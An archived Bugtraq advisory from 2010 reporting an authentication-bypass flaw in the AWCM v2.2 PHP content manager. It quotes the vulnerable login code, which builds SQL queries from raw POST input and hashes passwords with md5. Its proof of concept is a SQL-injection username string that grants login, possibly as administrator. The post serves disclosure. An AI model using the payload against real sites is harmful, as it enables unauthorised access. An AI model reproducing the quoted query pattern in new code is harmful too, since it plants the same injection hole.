lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20101116212101.7214.qmail@securityfocus.com>
Date: 16 Nov 2010 21:21:01 -0000
From: eidelweiss@...dowslive.com
To: bugtraq@...urityfocus.com
Subject: AWCM v2.2 Auth Bypass Vulnerabilities

########################################################
    AWCM v2.2 Auth Bypass Vulnerabilities
########################################################
  
  
 ____                  __                              __    __              
/\  _`\               /\ \      __                    /\ \__/\ \             
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __ 
 \ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
    \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                                /\____/                      
                                                \_/__/                       
 __      __          __          ______                       By:eidelweiss
/\ \  __/\ \        /\ \        /\  _  \                         
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____
 \ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\
  \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
    '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/
                                             \ \_\   \ \_\       
                                              \/_/    \/_/       
                                                          
  
[+]Script:	AWCM
[+]Version:	2.2 final
[+]Download:    http://sourceforge.net/projects/awcm/files/AWCM%20v2.2/AWCM%20v2.2%20final.zip/download
 ########################################################
  
[!]Author :	eidelweiss
[!]Contact:	eidelweiss[at]windowslive[dot]com
[!]Blog:  	http://eidelweiss-advisories.blogspot.com
[!]Gratz  :	DealCyber member`s , yogyacarderlink crew , and YOU !!!

Original Advisories:

http://eidelweiss-advisories.blogspot.com/2010/11/awcm-v22-auth-bypass-vulnerabilities.html
  
########################################################
  
	-=[Description]=-
  
ar web content manager is a free web contemts management system (cms) built with php , mysql , css , javascript , css to allow you to manage your website easily and fast.
it contains many main categories such as (videos, topics, sounds, photo gallery. 
 
########################################################
  
	-=[VUln Code]=-


first lets we see the code on login.php file

**********************************
<?php

include ("header.php");



$pusername = $_POST['username'];
$ppassword = md5($_POST['password']);
$premember = $_POST['remember'];

$mysql_login547_query = mysql_query("SELECT username,password,id FROM 
awcm_members WHERE username = '$pusername' AND password = '$ppassword'");
$mysql_login547_total = mysql_num_rows($mysql_login547_query);
$mysql_login547_row   = mysql_fetch_array($mysql_login547_query);
---------
**********************************

ok, now we see the code in control/login.php file
and on this file i see the vulnerability code that can be used by attacker or anonymous to bypass the login section..
its also possible to gain the administrator access ( if you lucky ofcourse :D )

here the code on control/login.php file:

**********************************
<?php
$page = 'login';
include ("common.php");

if(isset($_GET['do'])) {
$user = $_POST['username'];		// <= i dont give fuck
$pass = md5($_POST['password']);	// 

$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");
$cp_login_total = mysql_num_rows($cp_login_query);

**********************************


########################################################
  
	-=[ How To Exploit / P0C ]=-

put as username : 'or 1=1/*
 
=========================| -=[ E0F ]=- |============================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ